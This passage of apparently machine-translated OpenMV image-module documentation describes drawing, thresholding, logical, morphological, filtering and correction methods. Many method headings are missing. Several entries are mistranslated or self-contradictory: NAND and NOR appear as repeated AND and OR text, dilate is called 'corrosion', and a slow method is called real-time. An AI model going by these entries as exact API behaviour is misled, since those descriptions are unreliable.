method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_image(image, x, y[, x_scale=1.0[, y_scale=1.0[, mask=None]]])\n\nDraw an image whose top left corner starts at position x, y. You can pass x, y alone or pass it to a tuple (x, y).\n\nX_scale Controls the extent to which the image is scaled in the x direction (floating point).\n\nY_scale Controls the extent to which the image is scaled in the y direction (floating point).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. You can use the mask mask to draw.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_keypoints(keypoints[, color[, size=10[, thickness=1[, fill=False]]]])\n\nDraw a point of a feature point object on the image.\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nSize Controls the size of feature points.\n\nThickness The thickness of the control line.\n\nSet fill to True to fill the feature points.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.flood_fill(x, y[, seed_threshold=0.05[, floating_threshold=0.05[, color[, invert=False[, clear_background=False[, mask=None]]]]])\n\nThe area where the image is filled starting from position x, y. You can pass x, y alone or pass it to a tuple (x, y).\n\nSeed_threshold Controls the difference between the pixels in the fill area and the original start pixel.\n\nFloating_threshold Controls the difference between pixels in the fill area and any adjacent pixels.\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nPass invert to True to repopulate everything outside the flood_fill connection area.\n\nPass clear_background as True and zero the remaining flood_fill pixels that are not recolored.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask will be evaluated at flood_fill.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nSets all pixels in the image to black or white depending on whether the pixel is within the threshold in the threshold list thresholds.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nSet zero to True to make the threshold pixel zero and leave the pixels that are not in the threshold list unchanged.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.invert()\n\nChange binary image 0 (black) to 1 (white) and 1 (white) to 0 (black) to flip all pixel values ​​in the binary image very quickly.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and Bayer images are not supported.\n\nUse another image to perform a logical AND operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform a logical AND operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform a logical OR operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform a logical OR operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform an exclusive OR operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to logically AND the same image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nRemove pixels from the edges of the split area.\n\nThis method is implemented by convolving the kernel of ((size2)+1)x((size2)+1) pixels on the convolution image. If the sum of the adjacent pixel sets is smaller than threshold, then the center pixel of the kernel is performed. Return to zero.\n\nIf the threshold is not set, this method functions as the standard corrosion method. If the threshold is set, you can specify a specific pixel to be etched. For example, set a threshold of 2 around pixels that are less than 2 pixels.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nAdd pixels to the edges of the split area.\n\nThis method is implemented by convolving the kernel of ((size2)+1)x((size2)+1) pixels on the convolution image. If the sum of the adjacent pixel sets is greater than threshold, the central pixel of the kernel is performed. Settings.\n\nIf the threshold is not set, this method functions as the standard corrosion method. If the threshold is set, you can specify a specific pixel to be etched. For example, set a threshold of 2 around pixels that are less than 2 pixels.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe image is subjected to corrosion and expansion in sequence. See image.erode() and image.dilate() for more information.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe image is expanded and etched in sequence. See image.erode() and image.dilate() for more information.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nReturns the difference between the original image and the image after executing the image.open() function.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nCompressed images and bayer images are not supported.\n\nReturns the difference between the original image and the image after executing the image.close() function.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nCompressed images and bayer images are not supported.\n\n#### image.negate()\n\nFlip (number invert) all pixel values ​​in the image very quickly. The value of the pixel value of each color channel is converted. Example: (255 - pixel).\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSet hmirror to True to replace the image with a horizontal mirror.\n\nSet vflip to True to replace the image with a vertical flip.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nAdd two images to each other in pixels.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe two images are subtracted from each other by pixel.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSet reverse to True to reverse the subtraction from this_image-image to image-this_image .\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nMultiply two images by pixel by pixel.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSetting invert to True changes the multiplication operation from ab to 1/((1/a)(1/b)). In particular, this brightens the image rather than darkening the image (eg, multiply and burn operations).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nDivide this image by another image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSet invert to True to change the division direction from a/b to b/a.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nAt the pixel level, replace the pixels in this image with the smallest pixel value between this image and another image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nThe mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV4.\n\nReplace pixels in this image at the pixel level with the maximum pixel value between this image and another image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe two images are taken to each other in absolute values. Example: For each color channel, replace each pixel with ABS (this.pixel-image.pixel).\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nCombine another image image with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nAlpha controls how much other images are to be blended into this image. alpha should be an integer value between 0 and 256. A value close to zero will mix more images into this image, and close to 256 is the opposite.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nRun a histogram equalization algorithm on the image. Histogram equalization normalizes contrast and brightness in the image.\n\nIf adaptive passes to True, the adaptive histogram equalization method will be run on the image, which is usually better than the non-adaptive histogram qualification, but runs longer.\n\nClip_limit provides a way to limit the contrast of adaptive histogram equalization. A good histogram equalization contrast limited image can be generated using a small value (eg 10).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.mean(size, [threshold=False, [offset=0, [invert=False, [mask=None]]]]])\n\nStandard mean blur filtering using a box filter.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nMedian(size, percentile=0.5, threshold=False, offset=0, invert=False, mask]) Run median filtering on the image. Median filtering is the best filtering to smooth the surface, but at very slow speeds, while preserving the edges.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nPercentile Controls the percentile of the values ​​used in the kernel. By default, each pixel is replaced with an adjacent fiftyth percentile (center). You can set this value to 0 when using minimum filtering, to 0.25 for lower quartile filtering, to 0.75 for upper quartile filtering, and to 1 for maximum filtering.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.mode(size[, threshold=False, offset=0, invert=False, mask])\n\nRun a majority filter on the image, replacing each pixel with the pattern of adjacent pixels. This method works well on grayscale images. However, due to the non-linear nature of this operation, many artifacts are produced on the edges of the RGB image.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core).\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.midpoint(size[, bias=0.5, threshold=False, offset=0, invert=False, mask])\n\nRun midpoint filtering on the image. This filter finds the midpoint of the neighborhood of each pixel in the image ((max-min)/2).\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nBias Controls the minimum/maximum degree of image blending. 0 is only for minimum filtering and 1 is for maximum filtering only. You can minimize/maximize filtering of images with bias.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nThe image is convolved through the filter kernel. This allows you to perform a general convolution on the image.\n\nSize Controls the size of the kernel to ((size2)+1)x((size2)+1) pixels.\n\nKernel The kernel used to convolve the image, either as a tuple or as a list of values ​​[-128:127].\n\nMul is the number used to multiply the result of the convolutional pixel. If not set, it defaults to a value that will prevent scaling in the convolution output.\n\nAdd is the number used to add the convolution result to each pixel.\n\nMul can be used for global contrast adjustment, and add can be used for global brightness adjustment.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe image is convolved by a smooth Gaussian kernel.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nIf unsharp is set to True, this method does not perform Gaussian filtering only, but performs an unsharp masking operation to improve the image sharpness of the edges.\n\nMul is the number used to multiply the result of the convolutional pixel. If not set, it defaults to a value that will prevent scaling in the convolution output.\n\nAdd is the number used to add the convolution result to each pixel.\n\nMul can be used for global contrast adjustment, and add can be used for global brightness adjustment.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nThe image is convolved by edge detection of the Laplacian kernel.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nIf sharpen is set to True, this method will instead sharpen the image instead of just outputting edge-detected images that have not been thresholded. Increase the kernel size and increase the image clarity.\n\nMul is the number used to multiply the result of the convolutional pixel. If not set, it defaults to a value that will prevent scaling in the convolution output.\n\nAdd is the number used to add the convolution result to each pixel.\n\nMul can be used for global contrast adjustment, and add can be used for global brightness adjustment.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.bilateral(size[, color_sigma=0.1[, space_sigma=1[, threshold=False[, offset=0[, invert=False[, mask=None]]]]])\n\nThe image is convolved by a bilateral filter. A bilateral filter smoothes the image while maintaining the edges in the image.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nThe color_sigma control uses a bilateral filter to match the proximity of the color. Increasing this value increases the color blur.\n\nSpace_sigma controls the degree to which pixels are blurred in space. Increasing this value increases pixel blur.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nRoam the image and fill all the pixel areas in the image using the flood-fills algorithm. This effectively removes texture from the image by flattening the colors in all areas of the image. For best results, the image should have a lot of contrast so that the areas don't penetrate too easily.\n\nSeed_threshold Controls the difference between the pixels in the fill area and the original start pixel.\n\nFloating_threshold Controls the difference between pixels in the fill area and any adjacent pixels.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nRemove the shadow from the image.\n\nIf the current image does not have a \"shadowless\" version, this method will attempt to remove the shadow from the image, but there is no true unshaded image basis. This algorithm is suitable for removing shadows in a flat, uniform background. Note that this method takes many seconds to run and is only suitable for removing shadows in real time, dynamically generating an unshadowed version of the image. Future versions of the algorithm will work for more environments, but equally slow.\n\nIf the current image has a \"shadowless\" version, this method will remove all shadows in the image using the \"true source\" background unshadowed image to filter out the shadows. Non-shaded pixels are not filtered out, so you can add new objects that didn't exist before to the scene, and any non-shaded pixels in those objects will be displayed.\n\nReturns an image object so that you can use the . notation to call another method.\n\nOnly RGB565 images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.chrominvar()\n\nRemove the lighting effect from the image, leaving only the color gradient. Faster than image.illuminvar() but affected by shadows.\n\nReturns an image object so that you can use the . notation to call another method.\n\nOnly RGB565 images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.illuminvar()\n\nRemove the lighting effect from the image, leaving only the color gradient. Slower than image.chrominvar() but not affected by shadows.\n\nReturns an image object so that you can use the . notation to call another method.\n\nOnly RGB565 images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.linpolar([reverse=False])\n\nThe image is re-projected from Cartesian coordinates to linear polar coordinates.\n\nSet reverse = True to re-project in the opposite direction.\n\nLinear polar re-projection converts image rotation to x translation.\n\nCompressed images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.logpolar([reverse=False])\n\nThe image is re-projected from Cartesian coordinates to log polar coordinates.\n\nSet reverse = True to re-project in the opposite direction.\n\nLog-polar polar re-projection converts the rotation of the image to x translation and zoom to y translation.\n\nCompressed images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.lens_corr([strength=1.8[, zoom=1.0]])\n\nPerform lens distortion correction to remove the fisheye effect caused by the lens.\n\nStrength is a floating point number that determines how much the fisheye effect is applied to the image. By default, try the value of 1.8 first, then adjust this value to make the image show the best results.\n\nZoom is the value at which the image is scaled. The default is 1.0.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### img.rotation_corr([x_rotation=0.0[, y_rotation=0.0[, z_rotation=0.0[, x_translation=0.0[, y_translation=0.0[, zoom=1.0]]]]])\n\nThe perspective problem in the image is corrected by performing a 3D rotation of the frame buffer.\n\nX_rotation is the degree to which the image is rotated in the frame buffer around the x-axis (this causes the image to rotate up and down).\n\nY_rotation is the degree of rotation of the image around the y-axis in the frame buffer (ie, the image is rotated left and right).\n\nZ_rotation is the degree by which the image is rotated in the frame buffer around the z-axis (ie, the image is rotated to the appropriate position).\n\nX_translation is the number of units that move the image to the left or right after rotation. Because this transformation is applied in 3D space, the unit is not a pixel...\n\nY_translation is the number of units that move the image up or down after rotation. Because this transformation is applied in 3D space, the unit is not a pixel...\n\nZoom is the amount that is scaled by the image. By default 1.0.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.get_similarity(image)\n\nReturns a \"similarity\" object describing the two images using the SSIM algorithm to compare the similarities of 8x8 pixel patches between the two images.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.get_histogram([thresholds[, invert=False[, roi[, bins[, l_bins[, a_bins[, b_bins]]]]]])\n\nNormalize histogram operations on all color channels of roi and return histogram objects. Please refer to the histogram object for more information. You can also call this method using image.get_hist or image.histogram . If you pass the thresholds list, the histogram information will only be calculated from the pixels in the threshold list.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nUnless you need to use color statistics for advanced operations, simply use the `image.get_statistics()` method instead of this method to see the pixel areas in the image.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nBins and other bins are the number of bins used for the histogram channel. For grayscale images, use bins, for RGB565 images, use each of the other channels. The bin count for each channel must be greater than 2. In addition, it makes no sense to set the bin count to a number greater than the unique pixel value of each channel. By default, the histogram will have the maximum number of bins per channel.\n\nCompressed images and bayer images are not supported.\n\n#### image.get_statistics([thresholds[, invert=False[, roi[, bins[, l_bins[, a_bins[, b_bins]]]]]])\n\nCalculates the average, median, value, standard deviation, minimum, maximum, lower quartile, and upper quartile for each color channel in roi and returns a data object. See the statistics object for more information. You can also call this method using image.get_stats or image.statistics . If you pass the thresholds list, the histogram information will only be calculated from the pixels in the threshold list.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nYou can use this method when you need to get a 